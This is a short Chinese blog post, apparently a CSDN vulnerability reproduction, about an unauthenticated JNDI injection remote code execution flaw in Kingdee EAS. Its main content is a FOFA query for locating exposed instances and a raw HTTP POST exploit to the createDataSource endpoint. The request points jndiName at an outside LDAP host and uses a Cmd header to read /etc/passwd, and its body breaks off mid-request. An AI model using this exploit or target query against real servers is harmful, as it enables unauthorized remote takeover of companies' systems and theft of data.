【漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞

本文介绍了金蝶EAS的企业应用背景,详细阐述了其存在的JNDI注入漏洞,该漏洞允许未授权攻击者执行远程代码,可能导致服务器被完全控制。文章通过测绘语句和漏洞复现过程,揭示了漏洞的影响范围,并附有免责声明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

金蝶 EAS 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

0x02 漏洞概述

金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。

0x03 测绘语句

fofa: app="Kingdee-EAS"

0x04 漏洞复现

​
POST /appmonitor//protect/datasource/createDataSource HTTP/1.1

Host:

Cmd: cat /etc/passwd

Content-Type: application/x-www-form-urlencoded

Referer: https://xxxx

name=1234&jndiName=ldap://gobygo.net/A7&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=asdasxasx&userName=asdasxasx&password=asdasxasx&repassword=asdasxasx&connectionURL=sdasd&a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值